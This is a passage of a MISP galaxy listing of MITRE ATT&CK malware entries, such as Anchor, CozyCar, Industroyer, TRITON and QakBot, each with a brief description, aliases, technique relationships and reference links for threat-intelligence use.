[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)

The tag is: misp-galaxy:mitre-malware="Anchor - S0504"

Anchor - S0504 is also known as:

  • Anchor

  • Anchor_DNS

Table 7346. Table References

Links

https://attack.mitre.org/software/S0504

https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

CloudDuke - S0054

[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)

The tag is: misp-galaxy:mitre-malware="CloudDuke - S0054"

CloudDuke - S0054 is also known as:

  • CloudDuke

  • MiniDionis

  • CloudLook

CloudDuke - S0054 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7347. Table References

Links

https://attack.mitre.org/software/S0054

https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Exodus - S0405

[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)

The tag is: misp-galaxy:mitre-malware="Exodus - S0405"

Exodus - S0405 is also known as:

  • Exodus

  • Exodus One

  • Exodus Two

Table 7348. Table References

Links

https://attack.mitre.org/software/S0405

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Avaddon - S0640

[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)

The tag is: misp-galaxy:mitre-malware="Avaddon - S0640"

Avaddon - S0640 is also known as:

  • Avaddon

Table 7349. Table References

Links

https://arxiv.org/pdf/2102.04796.pdf

https://attack.mitre.org/software/S0640

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

CozyCar - S0046

[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CozyCar - S0046"

CozyCar - S0046 is also known as:

  • CozyCar

  • CozyDuke

  • CozyBear

  • Cozer

  • EuroAPT

CozyCar - S0046 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7350. Table References

Links

https://attack.mitre.org/software/S0046

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

ELMER - S0064

[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-malware="ELMER - S0064"

ELMER - S0064 is also known as:

  • ELMER

ELMER - S0064 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7351. Table References

Links

https://attack.mitre.org/software/S0064

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Gustuff - S0406

[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)

The tag is: misp-galaxy:mitre-malware="Gustuff - S0406"

Gustuff - S0406 is also known as:

  • Gustuff

Table 7352. Table References

Links

https://attack.mitre.org/software/S0406

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

Industroyer - S0604

[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)

The tag is: misp-galaxy:mitre-malware="Industroyer - S0604"

Industroyer - S0604 is also known as:

  • Industroyer

  • CRASHOVERRIDE

  • Win32/Industroyer

Table 7353. Table References

Links

https://attack.mitre.org/software/S0604

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

BBK - S0470

[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="BBK - S0470"

BBK - S0470 is also known as:

  • BBK

Table 7354. Table References

Links

https://attack.mitre.org/software/S0470

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Monokle - S0407

[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)

The tag is: misp-galaxy:mitre-malware="Monokle - S0407"

Monokle - S0407 is also known as:

  • Monokle

Table 7355. Table References

Links

https://attack.mitre.org/software/S0407

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

Sakula - S0074

[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)

The tag is: misp-galaxy:mitre-malware="Sakula - S0074"

Sakula - S0074 is also known as:

  • Sakula

  • Sakurel

  • VIPER

Sakula - S0074 has relationships with:

  • similar: misp-galaxy:rat="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7356. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/

https://attack.mitre.org/software/S0074

Cerberus - S0480

[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)

The tag is: misp-galaxy:mitre-malware="Cerberus - S0480"

Cerberus - S0480 is also known as:

  • Cerberus

Table 7357. Table References

Links

https://attack.mitre.org/software/S0480

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

PinchDuke - S0048

[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="PinchDuke - S0048"

PinchDuke - S0048 is also known as:

  • PinchDuke

PinchDuke - S0048 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7358. Table References

Links

https://attack.mitre.org/software/S0048

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

GeminiDuke - S0049

[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="GeminiDuke - S0049"

GeminiDuke - S0049 is also known as:

  • GeminiDuke

GeminiDuke - S0049 has relationships with:

  • similar: misp-galaxy:tool="GeminiDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7359. Table References

Links

https://attack.mitre.org/software/S0049

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Machete - S0409

[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-malware="Machete - S0409"

Machete - S0409 is also known as:

  • Machete

  • Pyark

Table 7360. Table References

Links

https://attack.mitre.org/software/S0409

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

https://securelist.com/el-machete/66108/

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

DoubleAgent - S0550

[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="DoubleAgent - S0550"

DoubleAgent - S0550 is also known as:

  • DoubleAgent

Table 7361. Table References

Links

https://attack.mitre.org/software/S0550

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

RARSTONE - S0055

[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)

The tag is: misp-galaxy:mitre-malware="RARSTONE - S0055"

RARSTONE - S0055 is also known as:

  • RARSTONE

RARSTONE - S0055 has relationships with:

  • similar: misp-galaxy:tool="RARSTONE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7362. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/

https://attack.mitre.org/software/S0055

TEARDROP - S0560

[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="TEARDROP - S0560"

TEARDROP - S0560 is also known as:

  • TEARDROP

Table 7363. Table References

Links

https://attack.mitre.org/software/S0560

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

EKANS - S0605

[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)

The tag is: misp-galaxy:mitre-malware="EKANS - S0605"

EKANS - S0605 is also known as:

  • EKANS

  • SNAKEHOSE

Table 7364. Table References

Links

https://attack.mitre.org/software/S0605

https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/

https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

ViperRAT - S0506

[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT)

The tag is: misp-galaxy:mitre-malware="ViperRAT - S0506"

ViperRAT - S0506 is also known as:

  • ViperRAT

Table 7365. Table References

Links

https://attack.mitre.org/software/S0506

https://blog.lookout.com/viperrat-mobile-apt

QakBot - S0650

[QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)

The tag is: misp-galaxy:mitre-malware="QakBot - S0650"

QakBot - S0650 is also known as:

  • QakBot

  • Pinkslipbot

  • QuackBot

  • QBot

Table 7366. Table References

Links

https://attack.mitre.org/software/S0650

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

https://redcanary.com/threat-detection-report/threats/qbot/

https://securelist.com/qakbot-technical-analysis/103931/

https://success.trendmicro.com/solution/000283381

BitPaymer - S0570

[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)

The tag is: misp-galaxy:mitre-malware="BitPaymer - S0570"

BitPaymer - S0570 is also known as:

  • BitPaymer

  • wp_encrypt

  • FriedEx

Table 7367. Table References

Links

https://attack.mitre.org/software/S0570

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

eSurv - S0507

[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)

The tag is: misp-galaxy:mitre-malware="eSurv - S0507"

eSurv - S0507 is also known as:

  • eSurv

Table 7368. Table References

Links

https://attack.mitre.org/software/S0507

https://blog.lookout.com/esurv-research

SslMM - S0058

[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="SslMM - S0058"

SslMM - S0058 is also known as:

  • SslMM

SslMM - S0058 has relationships with:

  • similar: misp-galaxy:malpedia="SslMM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7369. Table References

Links

https://attack.mitre.org/software/S0058

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

FakeSpy - S0509

[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)

The tag is: misp-galaxy:mitre-malware="FakeSpy - S0509"

FakeSpy - S0509 is also known as:

  • FakeSpy

Table 7370. Table References

Links

https://attack.mitre.org/software/S0509

https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world

WinMM - S0059

[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="WinMM - S0059"

WinMM - S0059 is also known as:

  • WinMM

WinMM - S0059 has relationships with:

  • similar: misp-galaxy:malpedia="WinMM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7371. Table References

Links

https://attack.mitre.org/software/S0059

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Clambling - S0660

[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-malware="Clambling - S0660"

Clambling - S0660 is also known as:

  • Clambling

Table 7372. Table References

Links

https://attack.mitre.org/software/S0660

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

WarzoneRAT - S0670

[WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)

The tag is: misp-galaxy:mitre-malware="WarzoneRAT - S0670"

WarzoneRAT - S0670 is also known as:

  • WarzoneRAT

  • Warzone

  • Ave Maria

Table 7373. Table References

Links

https://attack.mitre.org/software/S0670

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

KillDisk - S0607

[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)

The tag is: misp-galaxy:mitre-malware="KillDisk - S0607"

KillDisk - S0607 is also known as:

  • KillDisk

  • Win32/KillDisk.NBI

  • Win32/KillDisk.NBH

  • Win32/KillDisk.NBD

  • Win32/KillDisk.NBC

  • Win32/KillDisk.NBB

Table 7374. Table References

Links

http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://attack.mitre.org/software/S0607

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html

https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html

FakeM - S0076

[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="FakeM - S0076"

FakeM - S0076 is also known as:

  • FakeM

FakeM - S0076 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7375. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0076

pngdowner - S0067

[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and- execute" utility. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="pngdowner - S0067"

pngdowner - S0067 is also known as:

  • pngdowner

pngdowner - S0067 has relationships with:

  • similar: misp-galaxy:malpedia="pngdowner" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

Table 7376. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0067

Conficker - S0608

[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)

The tag is: misp-galaxy:mitre-malware="Conficker - S0608"

Conficker - S0608 is also known as:

  • Conficker

  • Kido

  • Downadup

Table 7377. Table References

Links

https://attack.mitre.org/software/S0608

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm

LitePower - S0680

[LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-malware="LitePower - S0680"

LitePower - S0680 is also known as:

  • LitePower

Table 7378. Table References

Links

https://attack.mitre.org/software/S0680

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

ZLib - S0086

[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="ZLib - S0086"

ZLib - S0086 is also known as:

  • ZLib

ZLib - S0086 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7379. Table References

Links

https://attack.mitre.org/software/S0086

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

httpclient - S0068

[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="httpclient - S0068"

httpclient - S0068 is also known as:

  • httpclient

httpclient - S0068 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7380. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0068

BLACKCOFFEE - S0069

[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069"

BLACKCOFFEE - S0069 is also known as:

  • BLACKCOFFEE

BLACKCOFFEE - S0069 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7381. Table References

Links

https://attack.mitre.org/software/S0069

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

TRITON - S0609

This entry was deprecated as it was inadvertently added to Enterprise; a similar Software entry was created for ATT&CK for ICS.

[TRITON](https://attack.mitre.org/software/S0609) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. [TRITON](https://attack.mitre.org/software/S0609) was deployed against at least one target in the Middle East. (Citation: FireEye TRITON 2017)(Citation: FireEye TRITON 2018)(Citation: Dragos TRISIS)(Citation: CISA HatMan)(Citation: FireEye TEMP.Veles 2018)

The tag is: misp-galaxy:mitre-malware="TRITON - S0609"

TRITON - S0609 is also known as:

  • TRITON

  • HatMan

  • TRISIS

Table 7382. Table References

Links

https://attack.mitre.org/software/S0609

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

CallMe - S0077

[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="CallMe - S0077"

CallMe - S0077 is also known as:

  • CallMe

CallMe - S0077 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7383. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0077

Psylo - S0078

[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="Psylo - S0078"

Psylo - S0078 is also known as:

  • Psylo

Psylo - S0078 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7384. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0078

MobileOrder - S0079

[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="MobileOrder - S0079"

MobileOrder - S0079 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7385. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0079

Kasidet - S0088

[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)

The tag is: misp-galaxy:mitre-malware="Kasidet - S0088"

Kasidet - S0088 is also known as:

  • Kasidet

Kasidet - S0088 has relationships with:

  • similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7386. Table References

Links

http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html

https://attack.mitre.org/software/S0088

BlackEnergy - S0089

[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)

The tag is: misp-galaxy:mitre-malware="BlackEnergy - S0089"

BlackEnergy - S0089 is also known as:

  • BlackEnergy

  • Black Energy

BlackEnergy - S0089 has relationships with:

  • similar: misp-galaxy:tool="BlackEnergy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BlackEnergy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7387. Table References

Links

https://attack.mitre.org/software/S0089

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

H1N1 - S0132

[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)

The tag is: misp-galaxy:mitre-malware="H1N1 - S0132"

H1N1 - S0132 is also known as:

  • H1N1

H1N1 - S0132 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7388. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

https://attack.mitre.org/software/S0132

Tarrask - S1011

[Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task)

The tag is: misp-galaxy:mitre-malware="Tarrask - S1011"

Tarrask - S1011 is also known as:

  • Tarrask

Table 7389. Table References

Links

https://attack.mitre.org/software/S1011

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

ROCKBOOT - S0112

[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)

The tag is: misp-galaxy:mitre-malware="ROCKBOOT - S0112"

